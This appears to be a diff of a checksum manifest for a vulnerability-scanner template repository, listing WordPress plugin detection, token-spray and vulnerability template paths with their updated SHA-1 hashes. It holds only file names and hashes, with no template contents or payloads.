+http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:9bde7cc9f81f311664c3af445cf6db7fc956aafc -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:3e88ee2f15c81c352bc6ef9d46d43eb035627c99 -http/technologies/wordpress/plugins/mailpoet.yaml:8a8fff10355595b53c2b05b8b5b89dfa9735baa0 -http/technologies/wordpress/plugins/maintenance.yaml:2501fbcc1ce61eb3748e32822f07095da01de8ba -http/technologies/wordpress/plugins/mainwp-child.yaml:5b0b0631aa05bf9dc1cc1495c72aeeef6254fc70 -http/technologies/wordpress/plugins/malcare-security.yaml:50d312799efc54457b8fe945cedb45d4cd96f5e2 -http/technologies/wordpress/plugins/megamenu.yaml:858460eafa16921452aa4f4da5a1af8772642ff5 -http/technologies/wordpress/plugins/members.yaml:223b5fc480ff607536c1178ea1cbbf41082f9406 -http/technologies/wordpress/plugins/meta-box.yaml:ad71ec8535e741c37f91864e9b52119c7d9721ed -http/technologies/wordpress/plugins/metform.yaml:1bc38bc3045eea70e97c6286e94d55555fec69e9 -http/technologies/wordpress/plugins/ml-slider.yaml:a302b512f5c9df03dc9989d4fdbc7a4bbab2357d -http/technologies/wordpress/plugins/newsletter.yaml:8bd2d08d55cd409e513126e8f6f1f49b1b214c08 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:d2895caa916243beb7065c13610fbc18333512ee -http/technologies/wordpress/plugins/nextgen-gallery.yaml:82c7f6919daf48ceb0c1c945daf9792681717e2f -http/technologies/wordpress/plugins/ninja-forms.yaml:9d9afdd62b7f41c4dbec56ce31ced14b90c8569a -http/technologies/wordpress/plugins/ocean-extra.yaml:5f3eba720df897fe9644500a5a5e75a0e3862545 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:79c8fc493c202284309621108cba02a1185d8075 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ca383ec2bc76191ae6df4291e74debe7c90ad401 -http/technologies/wordpress/plugins/optinmonster.yaml:05c048fe52dae26d7799a8a7b46bb859a70d903a -http/technologies/wordpress/plugins/otter-blocks.yaml:f47b56d21dc05a166fb4801e46734604ee94e99f -http/technologies/wordpress/plugins/password-protected.yaml:ecb20ccd25826ff9f39ed3c2bcfb52de783d99ef -http/technologies/wordpress/plugins/pdf-embedder.yaml:c15167fc8c4e4f5f1db0dc7d80c21ed481f47548 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:c274f39e569adf0c41b69c94e3e3d6cf50b43817 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:3ab36b0c56e6ee82f2ff225ddfd98692c3e551ac +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:e805aa0f24118a419ba698e01f4040c3e021358d +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:5e4fcff3013e1150e9bc00f18cd741ddb444ecff -http/technologies/wordpress/plugins/pixelyoursite.yaml:0d39d5f9f8791ec2c4e0e82d166abcc52f64cc88 -http/technologies/wordpress/plugins/polylang.yaml:17a5f0eb9b59ded1ae41b0473b5fbe5f81e2b49e +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:6a0ac4f606a5bc5d1350c2778a232ced143e82d3 -http/technologies/wordpress/plugins/post-smtp.yaml:2a5175c852530644c848dae8b9efe0d734971a76 -http/technologies/wordpress/plugins/post-types-order.yaml:57a9945657a06ef724b3f68086c5c6087d478807 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4e64e80e48b445b173f5dae3931a6135d474809c -http/technologies/wordpress/plugins/pretty-link.yaml:5fdec6dbb18362e6b352ba9c73f5d6b72fd2eb12 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:714790c5ccffe911698148c6d5a084ade06b1d1b -http/technologies/wordpress/plugins/really-simple-ssl.yaml:424f6f0f742b8353add50a5a67d726f9098b6374 -http/technologies/wordpress/plugins/redirection.yaml:2a70ec690a4b8337444b43a8910a7bb9f821bb30 -http/technologies/wordpress/plugins/redux-framework.yaml:d17156992e614062320642e93e00068d8706c78e -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:822cc7179bf27d5f1294e436b0b228f75a33b6fe -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:d506cd4fb9fb130e575e13938bc303b73e311d23 -http/technologies/wordpress/plugins/safe-svg.yaml:1d68592d53245fd163be1a2b6d663548edfd3642 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:fd3df11cb0b4abfc547e537e399be687942a0748 -http/technologies/wordpress/plugins/sg-cachepress.yaml:c87f516a549966bb6099a7ad11eaf7038102e608 -http/technologies/wordpress/plugins/sg-security.yaml:7eae6b5992063d2d5fa0dddf78af61008ea9fd89 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:34d1e34f0f679b0d66015282f16fb8f68ca94114 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:0cb9b4abcea5c46017fe53aa8f03c1d880fcc349 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:c15a80a5cc0f201eb9abd075f382c73466dd1619 -http/technologies/wordpress/plugins/simple-history.yaml:428401adeb01d90bb66ca1a74c6ab974748ba84f +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:020ac98ee8b37e204e0935108f9d69e52db78397 +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:c622d3de397d6cfa07d2559fc6d6c18b2b3e4808 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:2ccc422006ab679518de8e4833c77e6136d43a66 -http/technologies/wordpress/plugins/smart-slider-3.yaml:0764ed2789a8aed472b38bbf7e5e73978cac00ab -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:24d23b48149355b44041e6758d904b26da95c91d +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:1b506638fa568e33eb4b4d431ac50441e4d2f943 +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:64352255e00203a566424a6375c659ad831995db -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:ee57a61d0ee8db9ce1bd10badeae43ecb9e74e9a -http/technologies/wordpress/plugins/sucuri-scanner.yaml:6dbcb2294c05f43148b7459530ec1a4e87e3dc2a -http/technologies/wordpress/plugins/svg-support.yaml:7ebe79de820424f63e801e13345393383904688c -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:67beae5b7e60e3590e5e472fef00d9cd753f9402 -http/technologies/wordpress/plugins/tablepress.yaml:88d22fdf0b8259eee47fb4808426c75b23d75a80 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:669c8e861e48a200ae5e377c6c05075505786801 -http/technologies/wordpress/plugins/templately.yaml:7eee3f8cd0ccfe4564cb53bf5f6e817e24443ab6 -http/technologies/wordpress/plugins/the-events-calendar.yaml:c21c53facd1eed245c6675a8ce6cdfbba3a46245 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:47246c8523badfa5a4f689e87aa5cc9f2819446f -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8195028b77e2b75d29001907062f8a089241c0a4 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:102e7671959d22f1b90d7aa1df5d3ec291407c8d -http/technologies/wordpress/plugins/under-construction-page.yaml:dc62b98489faeb293b4dcddecf96997671375931 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:aa282847e68d97e6d77598f39f828e079b56abec +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:84956ffa3c66999e7954e8fc01e90c5a7cbf3450 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:bd71e95dbc3a900ad490770f810052add0d0bbec -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:541b8fa6b70caef6e8d24c85e8cf2d4f8b4a2440 -http/technologies/wordpress/plugins/webp-express.yaml:e19bc18a2ee3a46f5f608fba46ee42c345bdf048 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:cb8320cdb9a0d46e840153a62b582ac17a81deb6 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:8b812a88f46f6dafe284b792cbfde491af9ae16a +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:99482722039f6b2535f106fd05648b4970693519 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:40c23133248e7e80eb7841c4c3dacef89eb1e18b -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:30eec2f4740565a279722d5c1dbed94aaaee1356 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:919a1481d7f6786ba37a9444f0416764a5b39bf9 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:a40045bf402e5f2e3efd147190fc55d915b397a9 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:571f58f01dd58da0b88cb18813804c43136d00a8 -http/technologies/wordpress/plugins/woocommerce-services.yaml:40efea716116f235dba0b4261ee7563a955d2409 -http/technologies/wordpress/plugins/woocommerce.yaml:ae0949e5d0aba79050b1c3e2e7501e54ff9e2605 -http/technologies/wordpress/plugins/wordfence.yaml:f0336cba08e5410cca101192a2f3d8ad277b3926 -http/technologies/wordpress/plugins/wordpress-importer.yaml:5b0255c4b935c1f044e44815a11c9044a88c045a -http/technologies/wordpress/plugins/wordpress-seo.yaml:65869b495e737bf4efe65395f86aeee0d7386b51 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:05d8f015b2df9b987d2c8927702b26eaaee002b0 -http/technologies/wordpress/plugins/wp-crontrol.yaml:5115ac807f59dc80c908ca13e7fc9f690a1079b9 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:66934161c695f5c9069afb763f73120d99588f8a -http/technologies/wordpress/plugins/wp-file-manager.yaml:76c8c89b1fc664d3923f1996bda67176978b2171 -http/technologies/wordpress/plugins/wp-google-maps.yaml:4411ffe1d58bb2c542db2463671620d53a5c5c3c +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 http/technologies/wordpress/plugins/wp-mail-logging.yaml:43cc5e8e1534e83039984a4f1affb3c2552fe63f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:262459c159df1728b0a474d518d9127ba4ce6f17 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:aa2afafd33333f38eceb0ef4c7458ddb296b1768 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:10b7d3c96ef44d16cc9ab5da9eeed5395f11396d http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:64e8d6ccf84f4867e35435e511991bb0f3339fe0 -http/technologies/wordpress/plugins/wp-optimize.yaml:a5a1643e456db58b194081ddce17c4b205162960 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:59a9d0c207e7f022a654cd978aae30a55ae4fd88 -http/technologies/wordpress/plugins/wp-reset.yaml:d2dfb55770f14eb74757a5be6a5ba990f6a4b153 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e7b6f38ab4b26bd370b0199a36555e41d224c59b -http/technologies/wordpress/plugins/wp-rollback.yaml:8c99eb572125837195dfecbbe17c2b3925c3d2b9 -http/technologies/wordpress/plugins/wp-seopress.yaml:564b7b080a29a0263849bf2c5543bbcf73b45f0b -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:0b63209080da1a0303b0542e79cf4e73c0649576 -http/technologies/wordpress/plugins/wp-smushit.yaml:2cd0725593b6f89a800c4ab07a51429c48aa3389 -http/technologies/wordpress/plugins/wp-statistics.yaml:79610e2cf542be25ed2b98445e4bd63d99415c65 -http/technologies/wordpress/plugins/wp-super-cache.yaml:76cb21d7a5360e8f62c7c0820dce71758bda92e9 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:c902657ad91b75f538043b9bedf296b589cada6a -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ea1073b1af09f555ecf44141d828c49ce93d43d7 -http/technologies/wordpress/plugins/wpforms-lite.yaml:fd2a50e55e29f873e325ee2bd09c953f8c0bbaa0 -http/technologies/wordpress/plugins/wps-hide-login.yaml:c88f976a9c5409671d3ec2993292e34b5d1c6044 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:89aa35639b2790cfe7b54d6728fd711abd9634b7 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:2c2f6f9696b72d8b3028b1fc3d51b826ac3b7706 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:309f6210f6f9cf6cfeaf7384866447f02bb1b5f1 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8103,6 +8127,7 @@ http/token-spray/api-instagram.yaml:a4f0d2d8b6a15ddbb51864354e3c6eea24e972f1 http/token-spray/api-instatus.yaml:5b130c24f24ec314092b1524980041b74e5d9af6 http/token-spray/api-intelx.yaml:7b53c9ce6d5971a5e5bf4990fe8c1ab56cd4993b http/token-spray/api-intercom.yaml:8f7076476dc71b00a9fb5903ae2ca027ef25b35b +http/token-spray/api-intigriti.yaml:2892b6c0cb4313e10cc1cb2598dcc663aaf18175 http/token-spray/api-ip2whois.yaml:c57c1aeb01d5a4939707fd3299b52604523ccab6 http/token-spray/api-ipdata.yaml:add19a1fa2d4222f8fd428278c2b4fcc2c8f542d http/token-spray/api-ipfind.yaml:2ede69625991d8f7cefe5291708d66ba69333f38 @@ -8174,7 +8199,7 @@ http/token-spray/api-scrapingdog.yaml:36ec01b41847600aa7f9ed05803dd8f4512f78b7 http/token-spray/api-screenshotapi.yaml:23811c030da5191d10880ff1ca3702e804d51738 http/token-spray/api-securitytrails.yaml:44f62cc4ec23b27f88b04f2fe1cb0c75ff9c05a7 http/token-spray/api-segment.yaml:63b895eba7eb64c444fae6395fc62d771927d1fd -http/token-spray/api-sendgrid.yaml:b587e591da451481ef2045c1ef004f50c8aac1c5 +http/token-spray/api-sendgrid.yaml:21d6c429b7ce699ae8c37c0861827350ad1ed1a0 http/token-spray/api-sentry.yaml:c27b4ac6a50680ea817425649ebf3207f47a1b41 http/token-spray/api-serpstack.yaml:8b0856f6dd8f6c8aba7b037e7bc5ca69719e88f8 http/token-spray/api-shodan.yaml:3a23a419b00daa03036abcdb962ad4aac430d158 @@ -8348,7 +8373,6 @@ http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed http/vulnerabilities/httpbin/httpbin-xss.yaml:b8072d3dcf45a6ca85ef27483281733357126da7 http/vulnerabilities/huatian/huatian-oa-sqli.yaml:f4f35ad79e01a4fde957a9c16e13167c085e0341 http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml:dbd647cefaf1c14ab1e9f62163272f5b9e8077f4 -http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:26c4256fc8f7f9aca152325a69201d40114e7ded http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:9cc0d2d153371f8b8e9813f2d80dcb70e45eb360 http/vulnerabilities/ibm/eclipse-help-system-xss.yaml:dc33d3917657db7c3326f60100a56f62dff896e5 http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml:4b6f52418f7fcb15868c5c0475d560441fdf6987 @@ -8525,7 +8549,7 @@ http/vulnerabilities/other/flir-ax8-rce.yaml:fd4b4d66415434181644159f4e9df2783a6 http/vulnerabilities/other/flir-path-traversal.yaml:20ea7ec9ae605259a3ad44331264f78d544e3626 http/vulnerabilities/other/fortiportal-log4j-rce.yaml:88277141f9e9562c8b31492490287d294fe53261 http/vulnerabilities/other/fumasoft-sqli.yaml:66dfbb4fa91e289e8090cd7032ac39e03bbaeda2 -http/vulnerabilities/other/fumengyun-sqli.yaml:91839404a9cc8652affcebc9ae1675a025dd1689 +http/vulnerabilities/other/fumengyun-sqli.yaml:2d8c12cf1383084e4eb04c4dff7c812b3af17d11 http/vulnerabilities/other/geovision-geowebserver-lfi.yaml:476840a88653978b6c8a2d47c93341540460f1f7 http/vulnerabilities/other/geovision-geowebserver-xss.yaml:2dfb7186e21a93d525fb29eb4c2039ad26e3c7d1 http/vulnerabilities/other/global-domains-lfi.yaml:0aa5e3656a841e228dafc74bb53a23bc4f2cea3f @@ -8800,6 +8824,7 @@ http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb288 http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 http/vulnerabilities/ransomware/deadbolt-ransomware.yaml:03e8de5b6a3af7ba1b4a43ebb40fbf17ad6d70e4 http/vulnerabilities/realor/realor-gwt-system-sqli.yaml:3db2215e316b355062f1c740519476ba529eaced +http/vulnerabilities/retool/retool-svg-xss.yaml:8b536735301a61f2650ad8e2cd4de09920c38857 http/vulnerabilities/rocketchat/unauth-message-read.yaml:0637a5f584284cef93e1c8664da48e294e1640b1 http/vulnerabilities/royalevent/royalevent-management-xss.yaml:1ab3bf42fb9af854ff69e4a2b3c422ae78336fc8 